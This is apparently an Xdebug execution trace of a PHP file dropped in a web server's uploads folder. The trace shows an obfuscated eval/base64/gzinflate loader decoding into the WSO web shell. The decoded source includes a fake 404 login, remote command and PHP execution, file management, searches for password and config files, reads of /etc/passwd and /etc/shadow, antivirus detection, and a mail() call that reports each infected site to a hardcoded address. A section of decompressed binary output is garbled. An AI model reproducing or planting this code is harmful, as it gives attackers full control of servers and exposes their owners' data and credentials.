Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 23:03:48.908649] 1 0 1 0.000166 393512 1 3 0 0.000454 427096 {main} 1 /var/www/html/uploads/wsoo.php 0 0 1 A /var/www/html/uploads/wsoo.php 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==' 1 A /var/www/html/uploads/wsoo.php 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF' 2 4 0 0.000570 427096 base64_decode 0 /var/www/html/uploads/wsoo.php 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA==' 2 4 1 0.000595 427256 2 4 R 'K-KPSK*K-(J-.HKI,IHJ,N53OIMOI(.)*J-P).)1\004\001k\000' 2 5 0 0.000621 427224 gzinflate 0 /var/www/html/uploads/wsoo.php 4 1 'K-KPSK*K-(J-.HKI,IHJ,N53OIMOI(.)*J-P).)1\004\001k\000' 2 5 1 0.000648 427352 2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' 2 6 0 0.000670 427192 htmlspecialchars_decode 0 /var/www/html/uploads/wsoo.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' 2 6 1 0.000691 427224 2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' 2 7 0 0.000725 428752 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/wsoo.php 4 0 3 8 0 0.000745 428752 strrev 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF' 3 8 1 0.000834 461552 3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk' 3 9 0 0.000907 461520 base64_decode 0 /var/www/html/uploads/wsoo.php(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk' 3 9 1 0.001082 494320 3 9 R '\001Zgxk[\033;8>ϓÜOo@\002\034L\a\b\001bCH\bYݶ;>6~}~*]Z}\005Nf\031b[*J%T*J\033oga\032~O{\fs\037ϟiʵӻ\027\027緻\'G\027Gz>q\030ok5m\022\fxD~]o\021\n\031--\027\016\002\016J\0264`\021A\027:\017}Ϸ\035-\a@\005HE\024=\bn\016|)U!~Lr}^D)/\0328aCxH\a(4CX@[0\017ekϿ?\036X߶Gʷx-ϓÜOo@\002\034L\a\b\001bCH\bYݶ;>6~}~*]Z}\005Nf\031b[*J%T*J\033oga\032~O{\fs\037ϟiʵӻ\027\027緻\'G\027Gz>q\030ok5m\022\fxD~]o\021\n\031--\027\016\002\016J\0264`\021A\027:\017}Ϸ\035-\a@\005HE\024=\bn\016|)U!~Lr}^D)/\0328aCxH\a(4CX@[0\017ekϿ?\036X߶Gʷx-ϓÜOo@\002\034L\a\b\001bCH\bYݶ;>6~}~*]Z}\005Nf\031b[*J%T*J\033oga\032~O{\fs\037ϟiʵӻ\027\027緻\'G\027Gz>q\030ok5m\022\fxD~]o\021\n\031--\027\016\002\016J\0264`\021A\027:\017}Ϸ\035-\a@\005HE\024=\bn\016|)U!~Lr}^D)/\0328aCxH\a(4CX@[0\017ekϿ?\036X߶Gʷx-ϓÜOo@\002\034L\a\b\001bCH\bYݶ;>6~}~*]Z}\005Nf\031b[*J%T*J\033oga\032~O{\fs\037ϟiʵӻ\027\027緻\'G\027Gz>q\030ok5m\022\fxD~]o\021\n\031--\027\016\002\016J\0264`\021A\027:\017}Ϸ\035-\a@\005HE\024=\bn\016|)U!~Lr}^D)/\0328aCxH\a(4CX@[0\017ekϿ?\036X߶Gʷx-Not Found\r\n

The requested URL was not found on this server.

\r\n
\r\n
Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80
\r\n \r\n
\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'r00t.info wso Shell\r\n \r\n \r\n
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "".$path[$i]."/";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'\'.$k.\'\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'[ \'.$drive.\' ] \';\r\n } $drives .= \'
: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'\r\n \'. \'\'. \'
Hackers
\r\n
Uname: \'.substr(@php_uname(), 0, 120).\'
User: \'.$uid.\' ( \'.$user.\' ) Group: \'.$gid.\' ( \'.$group.\' )
Server: \'.@getenv(\'SERVER_SOFTWARE\').\'
Useful: \'.$usefl.\'
Downloaders: \'.$dwnldr.\'
Disabled functions: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'
\'.($GLOBALS[\'os\'] == \'win\'?\'Drives
Cwd\':\'Cwd\').\'		: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' [ home ]
Server IP
Client IP
HDD
Free
PHP
Safe Mode
Domains		: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'
: \'.$_SERVER[\'REMOTE_ADDR\'].\'
: \'.viewSize($totalSpace).\'
: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)
: \'.@phpversion().\' [ phpinfo ]
: \'.($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\').\'
: \'.$d0c.\'
\'. \'
\'.$menu.\'
\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"[ Writeable ]":"[ Not writable ]";\r\n echo \'
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
Change dir:
Read file:
Make dir:
\'.$is_writable.\'
Make file:
\'.$is_writable.\'
Execute:
\r\n \r\n \r\n \r\n \r\n Upload file:
\'.$is_writable.\'
\r\n
Wso shell\'.VERSION.\' ©\r\n Shell
\r\n
\r\n\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'
User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'\'.perms(@fileperms($f)).\'\';\r\n elseif (!@is_writable($f)) return \'\'.perms(@fileperms($f)).\'\';\r\n else return \'\'.perms(@fileperms($f)).\'\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'

Server security information

\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'\'.$n.\': \';\r\n if(strpos($v, "\\n") === false) echo $v.\'
\';\r\n else echo \'
\'.$v.\'
\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'
\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'
\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'
\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'
\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'

PHP info

\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'

\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'

Execution PHP-code

\';\r\n echo \' send using AJAX
\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'
\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'

File manager

\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'\r\n \r\n \';\r\n echo "";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'\';\r\n $l = $l?0:1;\r\n } echo \'\r\n
NameSizeModifyOwner/GroupPermissionsActions
